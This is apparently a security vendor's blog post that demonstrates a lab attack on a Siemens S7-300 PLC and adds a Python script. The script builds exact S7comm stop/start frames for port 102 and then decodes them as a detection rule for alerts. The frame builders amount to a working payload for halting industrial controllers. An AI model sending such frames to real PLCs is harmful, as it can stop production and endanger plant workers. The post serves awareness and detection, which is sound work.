There’s a party in your SCADA and you’re invited!

No, I have not gone insane, but it really could turn into a “party” for the factory workers if the production lines suddenly go down because of a hack.
We are going to see how easy it can be to attack an industrial plant from outside (or inside) the network and bring a whole factory’s workforce to a standstill.
We will structure this cyber attack around a simple methodology:

Gathering information

This is a targeted attack, meaning that the attacker already knows our OT (operational technology) environment.
But… how can this have happened? My company has private security; no outsider can get in without credentials.
It is highly likely that your devices are exposed to the Internet and indexed by IoT search engines such as Shodan.
I won’t go into detail about what Shodan is, but for everyday users it is like Facebook: instead of looking for people, you look for devices connected to the Internet, by brand, model, IP/host, company name, country, etc.
Going back to the case of this factory, let’s check what information the attacker has been able to get their hands on.
At the plant there is at least one PLC connected to the Internet. Let’s zoom in:
The attacker has found a Siemens Simatic S7-300 PLC running at our factory, with a firmware version that has known, unpatched vulnerabilities.

Image of a Siemens Simatic S7-300 PLC

Looking for vulnerabilities

At this stage, the attacker looks for security flaws or exploits that they could use to attack our PLC.
As we can see, this PLC has several known vulnerabilities.
  1. Remote denial of service (DoS): this attack stops the PLC on the spot, halting the production line in progress, which could cause an accident or even damage in other areas of the line.
  2. Remote memory viewer: the attack uses a back door in the device to download the contents of the PLC’s memory.
    This reveals which actions the compromised machine is programmed to perform; we could modify them and load them back onto the PLC to de-program the line or to cause greater damage (a workplace accident, mechanical breakage on the line, changes to the chemical formulation of the material, a reduction in production speed, etc.).
  3. CPU start and stop: not much needs saying here; it stops and starts the line with a single remote command.

Exploitation of vulnerabilities

Thanks to the results obtained in the previous stages, the attacker now has everything they need to attack our device and interrupt the whole shift.

Shall we get to work?

Let’s put ourselves in the attacker’s shoes and simulate the exploitation of some of the vulnerabilities found:

Note: The simulations were carried out on a Siemens S7-300 PLC, on a local network in a controlled environment.



PLC information:

As the screenshot shows, the PLC is configured as read-only with changes requiring a password, but that password protection is not actually enabled, so nothing stands in the way of access.

Remote attack from Denial of Service (DoS)

Even though there is a published exploit for the denial of service, it cannot be used in this instance, as the exploit works over port 80 and that port is closed on this PLC.

For the same reason we cannot use the remote memory viewer exploit either, as it also needs port 80 to be open.

So, using the payload of the published exploit, I had to write my own to shut down the PLC.



CPU start-up and stoppage

As we mentioned before, this attack allows an attacker to start and stop the PLC remotely.

Shutting down the PLC

Attack from the attacker’s machine

Evidence of a stopped PLC

Turning on the PLC

Attack from the attacker’s machine

Evidence of a started PLC
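
The “single remote command” behind these screenshots is an S7comm job on TCP port 102: a PLC Stop (function 0x29) or a PLC Control (function 0x28) naming the program invocation P_PROGRAM. An S7-300 whose password protection is not enabled, as in the configuration shown above, accepts these jobs from anyone who can reach port 102. The following is an added example, not code from the original article or from Sothis: it builds those frames byte for byte, following the packet templates of the open-source Snap7 library and the field names of Wireshark’s s7comm dissector, and then decodes them again the way a SOC sensor watching mirrored port-102 traffic would, so that a stop or start from an unexpected host raises an alert. The IP addresses, the sample traffic and the engineering-station allow-list are constructed for the example.

```python
"""S7comm PLC Stop / PLC Control jobs over ISO-on-TCP (port 102), built byte
for byte (layout taken from the Snap7 library's packet templates) and decoded
again as a SOC detection rule would decode mirrored traffic."""
import struct

# Function codes of the S7comm parameter block, named as in Wireshark's s7comm dissector
FUNCTION_NAMES = {
    0x04: "Read Var", 0x05: "Write Var",
    0x1a: "Request Download", 0x1b: "Download Block", 0x1c: "Download Ended",
    0x1d: "Start Upload", 0x1e: "Upload", 0x1f: "End Upload",
    0x28: "PLC Control", 0x29: "PLC Stop", 0xf0: "Setup Communication",
}
S7_PLC_CONTROL, S7_PLC_STOP = 0x28, 0x29
PI_SERVICE = b"P_PROGRAM"   # program invocation named by the CPU start/stop jobs
COTP_DT = b"\x02\xf0\x80"   # COTP data TPDU: length 2, DT, last data unit

def _wrap_job(param: bytes, pdu_ref: int) -> bytes:
    """Put an S7comm Job parameter block under an S7 header, COTP DT and TPKT."""
    # S7 header: protocol id 0x32, ROSCTR 1 = Job, reserved, PDU ref, param len, data len
    s7_header = struct.pack(">BBHHHH", 0x32, 0x01, 0, pdu_ref, len(param), 0)
    body = COTP_DT + s7_header + param
    return struct.pack(">BBH", 0x03, 0x00, 4 + len(body)) + body   # TPKT v3 + total length

def build_plc_stop(pdu_ref: int = 0x0e00) -> bytes:
    """PLC Stop (0x29): five fixed bytes, PI service length, PI service name."""
    return _wrap_job(bytes([S7_PLC_STOP]) + b"\x00" * 5
                     + bytes([len(PI_SERVICE)]) + PI_SERVICE, pdu_ref)

def build_plc_start(pdu_ref: int = 0x0c00, cold: bool = False) -> bytes:
    """PLC Control (0x28): seven fixed bytes, parameter block (empty = hot start,
    "C " = cold start), PI service length, PI service name."""
    block = b"C " if cold else b""
    param = (bytes([S7_PLC_CONTROL]) + b"\x00" * 6 + b"\xfd"
             + struct.pack(">H", len(block)) + block
             + bytes([len(PI_SERVICE)]) + PI_SERVICE)
    return _wrap_job(param, pdu_ref)

def build_setup_comm(pdu_ref: int = 0x0400) -> bytes:
    """Setup Communication (0xf0): the harmless job every S7 session begins with."""
    return _wrap_job(b"\xf0\x00" + struct.pack(">HHH", 1, 1, 480), pdu_ref)

def decode_s7(frame: bytes) -> dict:
    """Parse TPKT/COTP/S7comm and return the fields a detection rule cares about."""
    if len(frame) < 17 or frame[0] != 0x03 or struct.unpack(">H", frame[2:4])[0] != len(frame):
        raise ValueError("not a well-formed TPKT frame")
    off = 5 + frame[4]                      # skip COTP: length indicator + header
    if frame[off] != 0x32:
        raise ValueError("not S7comm")
    _, rosctr, _, pdu_ref, plen, _ = struct.unpack(">BBHHHH", frame[off:off + 10])
    hdr = 12 if rosctr in (2, 3) else 10    # Ack / Ack-Data carry two extra error bytes
    param = frame[off + hdr:off + hdr + plen]
    if len(param) != plen or not param:
        raise ValueError("truncated parameter block")
    info = {"rosctr": rosctr, "pdu_ref": pdu_ref, "function": param[0],
            "pi_service": None, "param_block": None}
    if rosctr == 1 and param[0] == S7_PLC_STOP:
        info["pi_service"] = param[7:7 + param[6]].decode("ascii")
    elif rosctr == 1 and param[0] == S7_PLC_CONTROL:
        blen = struct.unpack(">H", param[8:10])[0]
        info["param_block"] = param[10:10 + blen]
        n = param[10 + blen]
        info["pi_service"] = param[11 + blen:11 + blen + n].decode("ascii")
    return info

def classify(frame: bytes):
    """Map one frame to (severity, description); only Job PDUs carry commands."""
    info = decode_s7(frame)
    func = info["function"]
    name = FUNCTION_NAMES.get(func, "function 0x%02x" % func)
    if info["rosctr"] != 1:
        return ("info", name + " (response)")
    if func == S7_PLC_STOP:
        return ("high", "PLC Stop of %s" % info["pi_service"])
    if func == S7_PLC_CONTROL and info["pi_service"] == PI_SERVICE.decode():
        return ("high", "PLC Control: %s" % ("cold start" if info["param_block"] == b"C " else "hot start"))
    if func in (0x05, 0x1a, 0x1b, 0x1c, 0x28):
        return ("medium", name)             # writes, program downloads, block operations
    return ("info", name)

def scan(traffic, engineering_hosts):
    """Run classify() over (src, dst, frame) tuples and return alert lines."""
    alerts = []
    for src, dst, frame in traffic:
        sev, msg = classify(frame)
        if sev == "info":
            continue
        origin = "known engineering station" if src in engineering_hosts else "UNEXPECTED SOURCE"
        alerts.append("[%s] %s -> %s:102 %s (%s)" % (sev.upper(), src, dst, msg, origin))
    return alerts

# Constructed sample traffic (not a real capture): an unknown host talks to the PLC.
SAMPLE_TRAFFIC = [
    ("10.0.10.50", "10.0.10.20", build_setup_comm()),
    ("10.0.10.50", "10.0.10.20", build_plc_stop()),
    ("10.0.10.50", "10.0.10.20", build_plc_start()),
]

if __name__ == "__main__":
    for line in scan(SAMPLE_TRAFFIC, engineering_hosts={"10.0.10.10"}):
        print(line)
```

Run as-is, the script only parses the frames it built itself. Writing those same bytes to TCP port 102 of an unprotected S7-300 (which this example deliberately does not do) stops or starts the CPU, so that step belongs only in a controlled environment like the one described in the note above. On the defensive side, the `scan()` logic is what a port-102 sensor should do: a PLC Stop or a P_PROGRAM PLC Control from any host that is not a known engineering station is worth a high-severity alert, regardless of whether the PLC would have accepted it.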


What would this problem mean for a manufacturer?

  • Accidents in the workplace.
  • Lost money due to the lack of machine availability.
  • Stoppages in the rest of the plant’s areas.
  • Logistics at a standstill because there is no material to load.
  • Delayed orders due to a lack of stock.
  • Damage to the company’s reputation and public image.
  • Extra overtime costs to recover availability by running more production lines.

Is it the manufacturer’s fault?

No, it is not always the manufacturer’s fault. In this example we used a Siemens device, one of the biggest PLC brands on the market, a brand that takes security seriously, publishing updates when vulnerabilities appear, and whose products are known for their durability.

That is why we need to become more aware of the need to protect our SCADA systems: mainly by applying the corresponding updates, hardening the systems, segmenting the network, carrying out the appropriate audits and having a SOC service in place that monitors our network to detect and prevent intrusions and similar behaviour.

How has this happened?

In the same way that our computers and operating systems need updates to keep them stable and safe, our devices (PLCs, RTUs, HMIs…) also need to be taken care of.

We understand how difficult it is to keep operating systems and software up to date in industry: although the technology exists, applying an update is often not in our hands because of incompatibilities between operating systems and software, between software and PLCs, etc.

On top of this, updating would mean stopping the production lines, which leads to stoppage costs, a lack of stock and even a temporary loss of quality.

Alternatively, there is technology that can apply a virtual update (virtual patching), protecting operating systems or common software components against vulnerabilities that could be exploited and put the plant at risk.

At Sothis we analyse and study the needs of each client to offer them a tailor-made service that enables them to modernise their SCADA system and make it secure, with the aim of avoiding cyber security incidents that could lead to interruptions in production, theft of industrial information or even safety problems for the people working at the plant.